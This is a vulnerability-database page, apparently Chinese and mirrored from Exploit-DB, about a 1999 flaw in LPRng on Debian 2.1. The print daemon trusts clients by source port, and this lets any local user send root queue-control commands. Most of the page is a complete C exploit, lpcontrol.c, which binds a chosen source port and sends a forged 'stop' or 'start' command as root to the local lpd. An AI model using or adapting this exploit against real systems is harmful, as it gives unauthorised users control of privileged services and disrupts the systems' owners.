Debian 2.1 – Print Queue Control

Debian 2.1 – Print Queue Control

漏洞ID 1053403 漏洞类型
发布时间 1999-07-02 更新时间 1999-07-02
图片[1]-Debian 2.1 – Print Queue Control-安全小百科CVE编号 N/A
图片[2]-Debian 2.1 – Print Queue Control-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19384
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/508/info


The LPRng software is an enhanced, extended, and portable version of the Berkeley LPR software (the standard UNIX printer spooler) that ships with Debian GNU/Linux. When root controls the print queue, the authentication that is used is based on whether the client source port connecting to lpd is privileged or not. Apparently, lpd does not check the source port properly, and it is possible for any local user to control the print queue with a modified client. The consequences of this vulnerability being exploited is a compromise of print queue control.

---- start lpcontrol.c ----------------------------------------------
/* Exploit for lprng's source port check failure.
 * Written and tested on Debian GNU/Linux
 *
 * Chris Leishman <[email protected]>
 */


#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>


#define SRC_PORT 2056
#define HOST "127.0.0.1"
#define DST_PORT 515


int main(int argc, char **argv)
{
    int sock;
    struct sockaddr_in dest_sin;
    struct sockaddr_in src_sin;
    struct hostent *hp;
    unsigned long ipnum;
    char line[256];
    int mode = 0;

    if (argc < 2)
    {
        fprintf(stderr, "Usage: %s printer [stop|start]n", argv[0]);
        exit(EXIT_FAILURE);
    }

    if (argc >= 3)
    {
        if (!strcmp(argv[2], "start"))
            mode = 1;
        else if (strcmp(argv[2], "stop"))
        {
            fprintf(stderr, "Invalid mode.  Use stop or start.n");
            fprintf(stderr, "Usage: %s printer [stop|start]n", argv[0]);
            exit(EXIT_FAILURE);
        }
    }
    
    snprintf(line, sizeof(line), "%c%s root %s %sn",=20
             6, argv[1], (mode)? "start":"stop", argv[1]);

    memset(&dest_sin, 0, sizeof(struct sockaddr_in));
    dest_sin.sin_port = htons((short) DST_PORT);

    ipnum = (unsigned long) inet_addr(HOST);
    if (ipnum != ((unsigned long) INADDR_NONE))
    {
        dest_sin.sin_family = AF_INET;
        dest_sin.sin_addr.s_addr = ipnum;
    }
    else
    {
        if ((hp = gethostbyname(HOST)) == NULL)
        {
            fprintf(stderr, "Host lookup failed.n");
            exit(EXIT_FAILURE);
        }

        dest_sin.sin_family = hp->h_addrtype;
        memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0],
           (size_t)hp->h_length);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("Socket call failed");
        exit(EXIT_FAILURE);
    }

    src_sin.sin_family = AF_INET;
    src_sin.sin_addr.s_addr = INADDR_ANY;
    src_sin.sin_port = htons((u_short) SRC_PORT);

    if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0)
    {
        perror("Bind failed");
        exit(EXIT_FAILURE);
    }

    if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0)
    {
        close(sock);
        perror("Connect failed");
        exit(EXIT_FAILURE);
    }

    if (write(sock, line, strlen(line)) <= 0)
    {
        perror("Write failed");
        exit(EXIT_FAILURE);
    }

    close(sock);

    return EXIT_SUCCESS;
}

---- stop lpcontrol.c -----------------------------------------------

相关推荐: sshd认证代理机制窃取其他用户的凭据漏洞

sshd认证代理机制窃取其他用户的凭据漏洞 漏洞ID 1207222 漏洞类型 未知 发布时间 1999-01-01 更新时间 1999-01-01 CVE编号 CVE-1999-0248 CNNVD-ID CNNVD-199901-011 漏洞平台 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享